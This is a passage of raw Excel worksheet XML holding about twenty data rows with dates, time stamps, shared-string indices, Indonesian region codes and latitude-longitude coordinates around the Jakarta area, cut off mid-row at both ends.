        <v>11324</v>
      </c>
      <c r="M3401">
        <v>3171040002</v>
      </c>
      <c r="N3401">
        <v>3171040</v>
      </c>
      <c r="O3401">
        <v>3171</v>
      </c>
      <c r="P3401">
        <v>31</v>
      </c>
      <c r="Q3401" t="s">
        <v>163</v>
      </c>
      <c r="R3401" t="s">
        <v>163</v>
      </c>
      <c r="S3401" t="s">
        <v>108</v>
      </c>
      <c r="T3401" t="s">
        <v>33</v>
      </c>
      <c r="U3401" s="5">
        <v>10676558</v>
      </c>
      <c r="V3401" s="5" t="s">
        <v>17514</v>
      </c>
      <c r="W3401" s="5">
        <v>-625226</v>
      </c>
      <c r="X3401" t="s">
        <v>21250</v>
      </c>
      <c r="Y3401" t="str">
        <f t="shared" si="53"/>
        <v>-6.25226,106.76558</v>
      </c>
    </row>
    <row r="3402" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3402">
        <v>261433</v>
      </c>
      <c r="B3402" s="1">
        <v>44247</v>
      </c>
      <c r="C3402" s="2">
        <v>0.30292824074074071</v>
      </c>
      <c r="D3402" t="s">
        <v>22</v>
      </c>
      <c r="E3402" t="s">
        <v>23</v>
      </c>
      <c r="F3402" t="s">
        <v>11325</v>
      </c>
      <c r="H3402" t="s">
        <v>26</v>
      </c>
      <c r="I3402" t="s">
        <v>137</v>
      </c>
      <c r="J3402" t="s">
        <v>2627</v>
      </c>
      <c r="L3402" t="s">
        <v>11326</v>
      </c>
      <c r="M3402">
        <v>3216071008</v>
      </c>
      <c r="N3402">
        <v>3216071</v>
      </c>
      <c r="O3402">
        <v>3216</v>
      </c>
      <c r="P3402">
        <v>32</v>
      </c>
      <c r="Q3402" t="s">
        <v>2012</v>
      </c>
      <c r="R3402" t="s">
        <v>2013</v>
      </c>
      <c r="S3402" t="s">
        <v>41</v>
      </c>
      <c r="T3402" t="s">
        <v>42</v>
      </c>
      <c r="U3402" s="5">
        <v>10709488</v>
      </c>
      <c r="V3402" s="5" t="s">
        <v>17515</v>
      </c>
      <c r="W3402" s="5">
        <v>-627234</v>
      </c>
      <c r="X3402" t="s">
        <v>21251</v>
      </c>
      <c r="Y3402" t="str">
        <f t="shared" si="53"/>
        <v>-6.27234,107.09488</v>
      </c>
    </row>
    <row r="3403" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3403">
        <v>261470</v>
      </c>
      <c r="B3403" s="1">
        <v>44247</v>
      </c>
      <c r="C3403" s="2">
        <v>0.30435185185185182</v>
      </c>
      <c r="D3403" t="s">
        <v>22</v>
      </c>
      <c r="E3403" t="s">
        <v>23</v>
      </c>
      <c r="F3403" t="s">
        <v>11327</v>
      </c>
      <c r="G3403" t="s">
        <v>11328</v>
      </c>
      <c r="H3403" t="s">
        <v>26</v>
      </c>
      <c r="I3403" t="s">
        <v>908</v>
      </c>
      <c r="J3403" t="s">
        <v>4906</v>
      </c>
      <c r="L3403" t="s">
        <v>11329</v>
      </c>
      <c r="M3403">
        <v>3173010002</v>
      </c>
      <c r="N3403">
        <v>3173010</v>
      </c>
      <c r="O3403">
        <v>3173</v>
      </c>
      <c r="P3403">
        <v>31</v>
      </c>
      <c r="Q3403" t="s">
        <v>4908</v>
      </c>
      <c r="R3403" t="s">
        <v>1481</v>
      </c>
      <c r="S3403" t="s">
        <v>62</v>
      </c>
      <c r="T3403" t="s">
        <v>33</v>
      </c>
      <c r="U3403" s="5">
        <v>10681167</v>
      </c>
      <c r="V3403" s="5" t="s">
        <v>17516</v>
      </c>
      <c r="W3403" s="5">
        <v>-621205</v>
      </c>
      <c r="X3403" t="s">
        <v>21252</v>
      </c>
      <c r="Y3403" t="str">
        <f t="shared" si="53"/>
        <v>-6.21205,106.81167</v>
      </c>
    </row>
    <row r="3404" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3404">
        <v>261471</v>
      </c>
      <c r="B3404" s="1">
        <v>44247</v>
      </c>
      <c r="C3404" s="2">
        <v>0.30236111111111114</v>
      </c>
      <c r="D3404" t="s">
        <v>22</v>
      </c>
      <c r="E3404" t="s">
        <v>23</v>
      </c>
      <c r="F3404" t="s">
        <v>11330</v>
      </c>
      <c r="H3404" t="s">
        <v>26</v>
      </c>
      <c r="I3404" t="s">
        <v>3668</v>
      </c>
      <c r="J3404" t="s">
        <v>4778</v>
      </c>
      <c r="L3404" t="s">
        <v>11331</v>
      </c>
      <c r="M3404">
        <v>3174020004</v>
      </c>
      <c r="N3404">
        <v>3174020</v>
      </c>
      <c r="O3404">
        <v>3174</v>
      </c>
      <c r="P3404">
        <v>31</v>
      </c>
      <c r="Q3404" t="s">
        <v>31</v>
      </c>
      <c r="R3404" t="s">
        <v>31</v>
      </c>
      <c r="S3404" t="s">
        <v>32</v>
      </c>
      <c r="T3404" t="s">
        <v>33</v>
      </c>
      <c r="U3404" s="5">
        <v>10676485</v>
      </c>
      <c r="V3404" s="5" t="s">
        <v>17517</v>
      </c>
      <c r="W3404" s="5">
        <v>-620237</v>
      </c>
      <c r="X3404" t="s">
        <v>21253</v>
      </c>
      <c r="Y3404" t="str">
        <f t="shared" si="53"/>
        <v>-6.20237,106.76485</v>
      </c>
    </row>
    <row r="3405" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3405">
        <v>261472</v>
      </c>
      <c r="B3405" s="1">
        <v>44247</v>
      </c>
      <c r="C3405" s="2">
        <v>0.30572916666666666</v>
      </c>
      <c r="D3405" t="s">
        <v>22</v>
      </c>
      <c r="E3405" t="s">
        <v>23</v>
      </c>
      <c r="F3405" t="s">
        <v>11332</v>
      </c>
      <c r="H3405" t="s">
        <v>26</v>
      </c>
      <c r="I3405" t="s">
        <v>131</v>
      </c>
      <c r="J3405" t="s">
        <v>3135</v>
      </c>
      <c r="L3405" t="s">
        <v>11333</v>
      </c>
      <c r="M3405">
        <v>3671010001</v>
      </c>
      <c r="N3405">
        <v>3671010</v>
      </c>
      <c r="O3405">
        <v>3671</v>
      </c>
      <c r="P3405">
        <v>36</v>
      </c>
      <c r="Q3405" t="s">
        <v>4656</v>
      </c>
      <c r="R3405" t="s">
        <v>200</v>
      </c>
      <c r="S3405" t="s">
        <v>201</v>
      </c>
      <c r="T3405" t="s">
        <v>171</v>
      </c>
      <c r="U3405" s="5">
        <v>10668764</v>
      </c>
      <c r="V3405" s="5" t="s">
        <v>17518</v>
      </c>
      <c r="W3405" s="5">
        <v>-623711</v>
      </c>
      <c r="X3405" t="s">
        <v>21254</v>
      </c>
      <c r="Y3405" t="str">
        <f t="shared" si="53"/>
        <v>-6.23711,106.68764</v>
      </c>
    </row>
    <row r="3406" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3406">
        <v>261473</v>
      </c>
      <c r="B3406" s="1">
        <v>44247</v>
      </c>
      <c r="C3406" s="2">
        <v>0.30574074074074076</v>
      </c>
      <c r="D3406" t="s">
        <v>22</v>
      </c>
      <c r="E3406" t="s">
        <v>23</v>
      </c>
      <c r="F3406" t="s">
        <v>11334</v>
      </c>
      <c r="G3406" t="s">
        <v>11335</v>
      </c>
      <c r="H3406" t="s">
        <v>26</v>
      </c>
      <c r="I3406" t="s">
        <v>961</v>
      </c>
      <c r="J3406" t="s">
        <v>2916</v>
      </c>
      <c r="L3406" t="s">
        <v>11336</v>
      </c>
      <c r="M3406">
        <v>3172040003</v>
      </c>
      <c r="N3406">
        <v>3172040</v>
      </c>
      <c r="O3406">
        <v>3172</v>
      </c>
      <c r="P3406">
        <v>31</v>
      </c>
      <c r="Q3406" t="s">
        <v>552</v>
      </c>
      <c r="R3406" t="s">
        <v>281</v>
      </c>
      <c r="S3406" t="s">
        <v>49</v>
      </c>
      <c r="T3406" t="s">
        <v>33</v>
      </c>
      <c r="U3406" s="5">
        <v>10688108</v>
      </c>
      <c r="V3406" s="5" t="s">
        <v>17519</v>
      </c>
      <c r="W3406" s="5">
        <v>-626559</v>
      </c>
      <c r="X3406" t="s">
        <v>21255</v>
      </c>
      <c r="Y3406" t="str">
        <f t="shared" si="53"/>
        <v>-6.26559,106.88108</v>
      </c>
    </row>
    <row r="3407" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3407">
        <v>261474</v>
      </c>
      <c r="B3407" s="1">
        <v>44247</v>
      </c>
      <c r="C3407" s="2">
        <v>0.30628472222222219</v>
      </c>
      <c r="D3407" t="s">
        <v>22</v>
      </c>
      <c r="E3407" t="s">
        <v>23</v>
      </c>
      <c r="F3407" t="s">
        <v>11337</v>
      </c>
      <c r="H3407" t="s">
        <v>26</v>
      </c>
      <c r="I3407" t="s">
        <v>2005</v>
      </c>
      <c r="J3407" t="s">
        <v>10660</v>
      </c>
      <c r="L3407" t="s">
        <v>250</v>
      </c>
      <c r="M3407">
        <v>3174020004</v>
      </c>
      <c r="N3407">
        <v>3174020</v>
      </c>
      <c r="O3407">
        <v>3174</v>
      </c>
      <c r="P3407">
        <v>31</v>
      </c>
      <c r="Q3407" t="s">
        <v>31</v>
      </c>
      <c r="R3407" t="s">
        <v>31</v>
      </c>
      <c r="S3407" t="s">
        <v>32</v>
      </c>
      <c r="T3407" t="s">
        <v>33</v>
      </c>
      <c r="U3407" s="5">
        <v>10676050</v>
      </c>
      <c r="V3407" s="5" t="s">
        <v>17520</v>
      </c>
      <c r="W3407" s="5">
        <v>-619429</v>
      </c>
      <c r="X3407" t="s">
        <v>21256</v>
      </c>
      <c r="Y3407" t="str">
        <f t="shared" si="53"/>
        <v>-6.19429,106.76050</v>
      </c>
    </row>
    <row r="3408" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3408">
        <v>261488</v>
      </c>
      <c r="B3408" s="1">
        <v>44247</v>
      </c>
      <c r="C3408" s="2">
        <v>0.30555555555555552</v>
      </c>
      <c r="D3408" t="s">
        <v>2648</v>
      </c>
      <c r="E3408" t="s">
        <v>23</v>
      </c>
      <c r="G3408" t="s">
        <v>11338</v>
      </c>
      <c r="H3408" t="s">
        <v>26</v>
      </c>
      <c r="J3408" t="s">
        <v>5747</v>
      </c>
      <c r="L3408" t="s">
        <v>11339</v>
      </c>
      <c r="M3408">
        <v>3172050002</v>
      </c>
      <c r="N3408">
        <v>3172050</v>
      </c>
      <c r="O3408">
        <v>3172</v>
      </c>
      <c r="P3408">
        <v>31</v>
      </c>
      <c r="Q3408" t="s">
        <v>5749</v>
      </c>
      <c r="R3408" t="s">
        <v>358</v>
      </c>
      <c r="S3408" t="s">
        <v>49</v>
      </c>
      <c r="T3408" t="s">
        <v>33</v>
      </c>
      <c r="U3408" s="5">
        <v>10685754</v>
      </c>
      <c r="V3408" s="5" t="s">
        <v>17521</v>
      </c>
      <c r="W3408" s="5">
        <v>-629087</v>
      </c>
      <c r="X3408" t="s">
        <v>21257</v>
      </c>
      <c r="Y3408" t="str">
        <f t="shared" si="53"/>
        <v>-6.29087,106.85754</v>
      </c>
    </row>
    <row r="3409" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3409">
        <v>261549</v>
      </c>
      <c r="B3409" s="1">
        <v>44247</v>
      </c>
      <c r="C3409" s="2">
        <v>0.31184027777777779</v>
      </c>
      <c r="D3409" t="s">
        <v>22</v>
      </c>
      <c r="E3409" t="s">
        <v>23</v>
      </c>
      <c r="F3409" t="s">
        <v>11340</v>
      </c>
      <c r="G3409" t="s">
        <v>11341</v>
      </c>
      <c r="H3409" t="s">
        <v>26</v>
      </c>
      <c r="I3409" t="s">
        <v>517</v>
      </c>
      <c r="J3409" t="s">
        <v>11342</v>
      </c>
      <c r="L3409" t="s">
        <v>11343</v>
      </c>
      <c r="M3409">
        <v>3172050004</v>
      </c>
      <c r="N3409">
        <v>3172050</v>
      </c>
      <c r="O3409">
        <v>3172</v>
      </c>
      <c r="P3409">
        <v>31</v>
      </c>
      <c r="Q3409" t="s">
        <v>2717</v>
      </c>
      <c r="R3409" t="s">
        <v>358</v>
      </c>
      <c r="S3409" t="s">
        <v>49</v>
      </c>
      <c r="T3409" t="s">
        <v>33</v>
      </c>
      <c r="U3409" s="5">
        <v>10687747</v>
      </c>
      <c r="V3409" s="5" t="s">
        <v>17522</v>
      </c>
      <c r="W3409" s="5">
        <v>-629473</v>
      </c>
      <c r="X3409" t="s">
        <v>21258</v>
      </c>
      <c r="Y3409" t="str">
        <f t="shared" si="53"/>
        <v>-6.29473,106.87747</v>
      </c>
    </row>
    <row r="3410" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3410">
        <v>261587</v>
      </c>
      <c r="B3410" s="1">
        <v>44247</v>
      </c>
      <c r="C3410" s="2">
        <v>0.31659722222222225</v>
      </c>
      <c r="D3410" t="s">
        <v>22</v>
      </c>
      <c r="E3410" t="s">
        <v>23</v>
      </c>
      <c r="F3410" t="s">
        <v>11344</v>
      </c>
      <c r="G3410" t="s">
        <v>11345</v>
      </c>
      <c r="H3410" t="s">
        <v>26</v>
      </c>
      <c r="I3410" t="s">
        <v>8427</v>
      </c>
      <c r="J3410" t="s">
        <v>5280</v>
      </c>
      <c r="L3410" t="s">
        <v>11346</v>
      </c>
      <c r="M3410">
        <v>3171060004</v>
      </c>
      <c r="N3410">
        <v>3171060</v>
      </c>
      <c r="O3410">
        <v>3171</v>
      </c>
      <c r="P3410">
        <v>31</v>
      </c>
      <c r="Q3410" t="s">
        <v>5027</v>
      </c>
      <c r="R3410" t="s">
        <v>1236</v>
      </c>
      <c r="S3410" t="s">
        <v>108</v>
      </c>
      <c r="T3410" t="s">
        <v>33</v>
      </c>
      <c r="U3410" s="5">
        <v>10681375</v>
      </c>
      <c r="V3410" s="5" t="s">
        <v>17464</v>
      </c>
      <c r="W3410" s="5">
        <v>-624391</v>
      </c>
      <c r="X3410" t="s">
        <v>21259</v>
      </c>
      <c r="Y3410" t="str">
        <f t="shared" si="53"/>
        <v>-6.24391,106.81375</v>
      </c>
    </row>
    <row r="3411" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3411">
        <v>261699</v>
      </c>
      <c r="B3411" s="1">
        <v>44247</v>
      </c>
      <c r="C3411" s="2">
        <v>0.32300925925925927</v>
      </c>
      <c r="D3411" t="s">
        <v>22</v>
      </c>
      <c r="E3411" t="s">
        <v>23</v>
      </c>
      <c r="F3411" t="s">
        <v>11347</v>
      </c>
      <c r="G3411" t="s">
        <v>11348</v>
      </c>
      <c r="H3411" t="s">
        <v>26</v>
      </c>
      <c r="I3411" t="s">
        <v>4833</v>
      </c>
      <c r="J3411" t="s">
        <v>2627</v>
      </c>
      <c r="L3411" t="s">
        <v>11349</v>
      </c>
      <c r="M3411">
        <v>3275031003</v>
      </c>
      <c r="N3411">
        <v>3275031</v>
      </c>
      <c r="O3411">
        <v>3275</v>
      </c>
      <c r="P3411">
        <v>32</v>
      </c>
      <c r="Q3411" t="s">
        <v>988</v>
      </c>
      <c r="R3411" t="s">
        <v>574</v>
      </c>
      <c r="S3411" t="s">
        <v>41</v>
      </c>
      <c r="T3411" t="s">
        <v>42</v>
      </c>
      <c r="U3411" s="5">
        <v>10701980</v>
      </c>
      <c r="V3411" s="5" t="s">
        <v>17523</v>
      </c>
      <c r="W3411" s="5">
        <v>-628441</v>
      </c>
      <c r="X3411" t="s">
        <v>21260</v>
      </c>
      <c r="Y3411" t="str">
        <f t="shared" si="53"/>
        <v>-6.28441,107.01980</v>
      </c>
    </row>
    <row r="3412" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3412">
        <v>261700</v>
      </c>
      <c r="B3412" s="1">
        <v>44247</v>
      </c>
      <c r="C3412" s="2">
        <v>0.32504629629629628</v>
      </c>
      <c r="D3412" t="s">
        <v>22</v>
      </c>
      <c r="E3412" t="s">
        <v>23</v>
      </c>
      <c r="F3412" t="s">
        <v>11350</v>
      </c>
      <c r="G3412" t="s">
        <v>11351</v>
      </c>
      <c r="H3412" t="s">
        <v>26</v>
      </c>
      <c r="I3412" t="s">
        <v>137</v>
      </c>
      <c r="J3412" t="s">
        <v>404</v>
      </c>
      <c r="M3412">
        <v>3174020005</v>
      </c>
      <c r="N3412">
        <v>3174020</v>
      </c>
      <c r="O3412">
        <v>3174</v>
      </c>
      <c r="P3412">
        <v>31</v>
      </c>
      <c r="Q3412" t="s">
        <v>30</v>
      </c>
      <c r="R3412" t="s">
        <v>31</v>
      </c>
      <c r="S3412" t="s">
        <v>32</v>
      </c>
      <c r="T3412" t="s">
        <v>33</v>
      </c>
      <c r="U3412" s="5">
        <v>10676913</v>
      </c>
      <c r="V3412" s="5" t="s">
        <v>17524</v>
      </c>
      <c r="W3412" s="5">
        <v>-616577</v>
      </c>
      <c r="X3412" t="s">
        <v>18489</v>
      </c>
      <c r="Y3412" t="str">
        <f t="shared" si="53"/>
        <v>-6.16577,106.76913</v>
      </c>
    </row>
    <row r="3413" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3413">
        <v>261701</v>
      </c>
      <c r="B3413" s="1">
        <v>44247</v>
      </c>
      <c r="C3413" s="2">
        <v>0.32645833333333335</v>
      </c>
      <c r="D3413" t="s">
        <v>22</v>
      </c>
      <c r="E3413" t="s">
        <v>23</v>
      </c>
      <c r="F3413" t="s">
        <v>11352</v>
      </c>
      <c r="G3413" t="s">
        <v>11353</v>
      </c>
      <c r="H3413" t="s">
        <v>26</v>
      </c>
      <c r="I3413" t="s">
        <v>1758</v>
      </c>
      <c r="J3413" t="s">
        <v>3135</v>
      </c>
      <c r="L3413" t="s">
        <v>11354</v>
      </c>
      <c r="M3413">
        <v>3671041003</v>
      </c>
      <c r="N3413">
        <v>3671041</v>
      </c>
      <c r="O3413">
        <v>3671</v>
      </c>
      <c r="P3413">
        <v>36</v>
      </c>
      <c r="Q3413" t="s">
        <v>11355</v>
      </c>
      <c r="R3413" t="s">
        <v>3137</v>
      </c>
      <c r="S3413" t="s">
        <v>201</v>
      </c>
      <c r="T3413" t="s">
        <v>171</v>
      </c>
      <c r="U3413" s="5">
        <v>10660086</v>
      </c>
      <c r="V3413" s="5" t="s">
        <v>17525</v>
      </c>
      <c r="W3413" s="5">
        <v>-620298</v>
      </c>
      <c r="X3413" t="s">
        <v>21261</v>
      </c>
      <c r="Y3413" t="str">
        <f t="shared" si="53"/>
        <v>-6.20298,106.60086</v>
      </c>
    </row>
    <row r="3414" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3414">
        <v>261739</v>
      </c>
      <c r="B3414" s="1">
        <v>44247</v>
      </c>
      <c r="C3414" s="2">
        <v>0.32863425925925926</v>
      </c>
      <c r="D3414" t="s">
        <v>22</v>
      </c>
      <c r="E3414" t="s">
        <v>23</v>
      </c>
      <c r="F3414" t="s">
        <v>11356</v>
      </c>
      <c r="G3414" t="s">
        <v>11357</v>
      </c>
      <c r="H3414" t="s">
        <v>26</v>
      </c>
      <c r="I3414" t="s">
        <v>11358</v>
      </c>
      <c r="J3414" t="s">
        <v>2627</v>
      </c>
      <c r="L3414" t="s">
        <v>11354</v>
      </c>
      <c r="M3414">
        <v>3275050001</v>
      </c>
      <c r="N3414">
        <v>3275050</v>
      </c>
      <c r="O3414">
        <v>3275</v>
      </c>
      <c r="P3414">
        <v>32</v>
      </c>
      <c r="Q3414" t="s">
        <v>4376</v>
      </c>
      <c r="R3414" t="s">
        <v>955</v>
      </c>
      <c r="S3414" t="s">
        <v>41</v>
      </c>
      <c r="T3414" t="s">
        <v>42</v>
      </c>
      <c r="U3414" s="5">
        <v>10695733</v>
      </c>
      <c r="V3414" s="5" t="s">
        <v>17526</v>
      </c>
      <c r="W3414" s="5">
        <v>-626512</v>
      </c>
      <c r="X3414" t="s">
        <v>21262</v>
      </c>
      <c r="Y3414" t="str">
        <f t="shared" si="53"/>
        <v>-6.26512,106.95733</v>
      </c>
    </row>
    <row r="3415" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3415">
        <v>261777</v>
      </c>
      <c r="B3415" s="1">
        <v>44247</v>
      </c>
      <c r="C3415" s="2">
        <v>0.33241898148148147</v>
      </c>
      <c r="D3415" t="s">
        <v>22</v>
      </c>
      <c r="E3415" t="s">
        <v>23</v>
      </c>
      <c r="F3415" t="s">
        <v>11359</v>
      </c>
      <c r="G3415" t="s">
        <v>11360</v>
      </c>
      <c r="H3415" t="s">
        <v>26</v>
      </c>
      <c r="I3415" t="s">
        <v>628</v>
      </c>
      <c r="J3415" t="s">
        <v>2627</v>
      </c>
      <c r="L3415" t="s">
        <v>11361</v>
      </c>
      <c r="M3415">
        <v>3275031001</v>
      </c>
      <c r="N3415">
        <v>3275031</v>
      </c>
      <c r="O3415">
        <v>3275</v>
      </c>
      <c r="P3415">
        <v>32</v>
      </c>
      <c r="Q3415" t="s">
        <v>10622</v>
      </c>
      <c r="R3415" t="s">
        <v>574</v>
      </c>
      <c r="S3415" t="s">
        <v>41</v>
      </c>
      <c r="T3415" t="s">
        <v>42</v>
      </c>
      <c r="U3415" s="5">
        <v>10698856</v>
      </c>
      <c r="V3415" s="5" t="s">
        <v>17527</v>
      </c>
      <c r="W3415" s="5">
        <v>-632310</v>
      </c>
      <c r="X3415" t="s">
        <v>21263</v>
      </c>
      <c r="Y3415" t="str">
        <f t="shared" si="53"/>
        <v>-6.32310,106.98856</v>
      </c>
    </row>
    <row r="3416" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3416">
        <v>261778</v>
      </c>
      <c r="B3416" s="1">
        <v>44247</v>
      </c>
      <c r="C3416" s="2">
        <v>0.33425925925925926</v>
      </c>
      <c r="D3416" t="s">
        <v>22</v>
      </c>
      <c r="E3416" t="s">
        <v>23</v>
      </c>
      <c r="F3416" t="s">
        <v>11362</v>
      </c>
      <c r="G3416" t="s">
        <v>11363</v>
      </c>
      <c r="H3416" t="s">
        <v>26</v>
      </c>
      <c r="I3416" t="s">
        <v>628</v>
      </c>
      <c r="J3416" t="s">
        <v>2627</v>
      </c>
      <c r="L3416" t="s">
        <v>11364</v>
      </c>
      <c r="M3416">
        <v>3275031001</v>
      </c>
      <c r="N3416">
        <v>3275031</v>
      </c>
      <c r="O3416">
        <v>3275</v>
      </c>
      <c r="P3416">
        <v>32</v>
      </c>
      <c r="Q3416" t="s">
        <v>10622</v>
      </c>
      <c r="R3416" t="s">
        <v>574</v>
      </c>
      <c r="S3416" t="s">
        <v>41</v>
      </c>
      <c r="T3416" t="s">
        <v>42</v>
      </c>
      <c r="U3416" s="5">
        <v>10698868</v>
      </c>
      <c r="V3416" s="5" t="s">
        <v>17528</v>
      </c>
      <c r="W3416" s="5">
        <v>-632313</v>
      </c>
      <c r="X3416" t="s">
        <v>21264</v>
      </c>
      <c r="Y3416" t="str">
        <f t="shared" si="53"/>
        <v>-6.32313,106.98868</v>
      </c>
    </row>
    <row r="3417" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3417">
        <v>261816</v>
      </c>
      <c r="B3417" s="1">
        <v>44247</v>
      </c>
      <c r="C3417" s="2">
        <v>0.33482638888888888</v>
      </c>
      <c r="D3417" t="s">
        <v>22</v>
      </c>
      <c r="E3417" t="s">
        <v>23</v>
      </c>
      <c r="F3417" t="s">
        <v>11365</v>
      </c>
      <c r="G3417" t="s">
        <v>11366</v>
      </c>
      <c r="H3417" t="s">
        <v>26</v>
      </c>
      <c r="I3417" t="s">
        <v>1201</v>
      </c>
      <c r="J3417" t="s">
        <v>11367</v>
      </c>
      <c r="L3417" t="s">
        <v>11368</v>
      </c>
      <c r="M3417">
        <v>3174020006</v>
      </c>
      <c r="N3417">
        <v>3174020</v>
      </c>
      <c r="O3417">
        <v>3174</v>
      </c>
      <c r="P3417">
        <v>31</v>
      </c>
      <c r="Q3417" t="s">
        <v>427</v>
      </c>
      <c r="R3417" t="s">
        <v>31</v>
      </c>
      <c r="S3417" t="s">
        <v>32</v>
      </c>
      <c r="T3417" t="s">
        <v>33</v>
      </c>
      <c r="U3417" s="5">
        <v>10676307</v>
      </c>
      <c r="V3417" s="5" t="s">
        <v>17529</v>
      </c>
      <c r="W3417" s="5">
        <v>-618358</v>
      </c>
      <c r="X3417" t="s">
        <v>19065</v>
      </c>
      <c r="Y3417" t="str">
        <f t="shared" si="53"/>
        <v>-6.18358,106.76307</v>
      </c>
    </row>
    <row r="3418" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3418">
        <v>261817</v>
      </c>
      <c r="B3418" s="1">
        <v>44247</v>
      </c>
      <c r="C3418" s="2">
        <v>0.33520833333333333</v>
      </c>
      <c r="D3418" t="s">
        <v>22</v>
      </c>
      <c r="E3418" t="s">
        <v>23</v>
      </c>
      <c r="F3418" t="s">
        <v>11369</v>
      </c>
      <c r="G3418" t="s">
        <v>11370</v>
      </c>
      <c r="H3418" t="s">
        <v>26</v>
      </c>
      <c r="I3418" t="s">
        <v>27</v>
      </c>
      <c r="J3418" t="s">
        <v>2627</v>
      </c>
      <c r="L3418" t="s">
        <v>11371</v>
      </c>
      <c r="M3418">
        <v>3275031001</v>
      </c>
      <c r="N3418">
        <v>3275031</v>
      </c>
      <c r="O3418">
        <v>3275</v>
      </c>
      <c r="P3418">
        <v>32</v>
      </c>
      <c r="Q3418" t="s">
        <v>10622</v>
      </c>
      <c r="R3418" t="s">
        <v>574</v>
      </c>
      <c r="S3418" t="s">
        <v>41</v>
      </c>
      <c r="T3418" t="s">
        <v>42</v>
      </c>
      <c r="U3418" s="5">
        <v>10698669</v>
      </c>
      <c r="V3418" s="5" t="s">
        <v>17530</v>
      </c>
      <c r="W3418" s="5">
        <v>-632308</v>
      </c>
      <c r="X3418" t="s">
        <v>21265</v>
      </c>
      <c r="Y3418" t="str">
        <f t="shared" si="53"/>
        <v>-6.32308,106.98669</v>
      </c>
    </row>
    <row r="3419" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3419">
        <v>261818</v>
      </c>
      <c r="B3419" s="1">
        <v>44247</v>
      </c>
      <c r="C3419" s="2">
        <v>0.33528935185185182</v>
      </c>
      <c r="D3419" t="s">
        <v>22</v>
      </c>
      <c r="E3419" t="s">
        <v>23</v>
      </c>
      <c r="F3419" t="s">
        <v>11372</v>
      </c>
      <c r="G3419" t="s">
        <v>11373</v>
      </c>
      <c r="H3419" t="s">
        <v>26</v>
      </c>
      <c r="I3419" t="s">
        <v>383</v>
      </c>
      <c r="J3419" t="s">
        <v>2627</v>
      </c>
      <c r="L3419" t="s">
        <v>11374</v>
      </c>
      <c r="M3419">
        <v>3275050001</v>
      </c>
      <c r="N3419">
        <v>3275050</v>
      </c>
      <c r="O3419">
        <v>3275</v>
      </c>
      <c r="P3419">
        <v>32</v>
      </c>
      <c r="Q3419" t="s">
        <v>4376</v>
      </c>
      <c r="R3419" t="s">
        <v>955</v>
      </c>
      <c r="S3419" t="s">
        <v>41</v>
      </c>
      <c r="T3419" t="s">
        <v>42</v>
      </c>
      <c r="U3419" s="5">
        <v>10695733</v>
      </c>
      <c r="V3419" s="5" t="s">
        <v>17526</v>
      </c>
      <c r="W3419" s="5">
        <v>-626509</v>
      </c>
      <c r="X3419" t="s">
        <v>21266</v>
      </c>
      <c r="Y3419" t="str">
        <f t="shared" si="53"/>
        <v>-6.26509,106.95733</v>
      </c>
    </row>
    <row r="3420" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3420">
        <v>261819</v>
      </c>
      <c r="B3420" s="1">
        <v>44247</v>
      </c>
      <c r="C3420" s="2">
        <v>0.33526620370370369</v>
      </c>
      <c r="D3420" t="s">
        <v>22</v>
      </c>
      <c r="E3420" t="s">
        <v>23</v>
      </c>
      <c r="F3420" t="s">
        <v>11375</v>
      </c>
      <c r="G3420" t="s">
        <v>11376</v>
      </c>
      <c r="H3420" t="s">
        <v>26</v>
      </c>
      <c r="I3420" t="s">
        <v>11377</v>
      </c>
      <c r="J3420" t="s">
        <v>4487</v>
      </c>
      <c r="L3420" t="s">
        <v>11378</v>
      </c>
      <c r="M3420">
        <v>3171070002</v>
      </c>
      <c r="N3420">
        <v>3171070</v>
      </c>
      <c r="O3420">
        <v>3171</v>
      </c>
      <c r="P3420">
        <v>31</v>
      </c>
      <c r="Q3420" t="s">
        <v>2142</v>
      </c>
      <c r="R3420" t="s">
        <v>121</v>
      </c>
      <c r="S3420" t="s">
        <v>108</v>
      </c>
      <c r="T3420" t="s">
        <v>33</v>
      </c>
      <c r="U3420" s="5">
        <v>10682361</v>
      </c>
      <c r="V3420" s="5" t="s">
        <v>17531</v>
      </c>
      <c r="W3420" s="5">
        <v>-625439</v>
      </c>
      <c r="X3420" t="s">
        <v>21267</v>
      </c>
      <c r="Y3420" t="str">
        <f t="shared" si="53"/>
        <v>-6.25439,106.82361</v>
      </c>
    </row>
    <row r="3421" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3421">
        <v>261820</v>
      </c>
      <c r="B3421" s="1">
        <v>44247</v>
      </c>
      <c r="C3421" s="2">
        <v>0.33653935185185185</v>
      </c>
      <c r="D3421" t="s">
        <v>22</v>
      </c>
      <c r="E3421" t="s">
        <v>23</v>
      </c>
      <c r="F3421" t="s">
        <v>11379</v>
      </c>
      <c r="G3421" t="s">
        <v>11380</v>
      </c>
      <c r="H3421" t="s">
        <v>26</v>
      </c>
      <c r="I3421" t="s">
        <v>517</v>
      </c>
      <c r="J3421" t="s">
        <v>2627</v>
      </c>
      <c r="L3421" t="s">
        <v>11381</v>
      </c>
      <c r="M3421">
        <v>3275031001</v>
      </c>
      <c r="N3421">
        <v>3275031</v>
      </c>
      <c r="O3421">
        <v>3275</v>
      </c>
      <c r="P3421">
        <v>32</v>
      </c>
      <c r="Q3421" t="s">
        <v>10622</v>
      </c>
      <c r="R3421" t="s">
        <v>574</v>
      </c>
      <c r="S3421" t="s">
        <v>41</v>
      </c>
      <c r="T3421" t="s">
        <v>42</v>
      </c>
      <c r="U3421" s="5">
        <v>10699046</v>
      </c>
      <c r="V3421" s="5" t="s">
        <v>17532</v>
      </c>
      <c r="W3421" s="5">
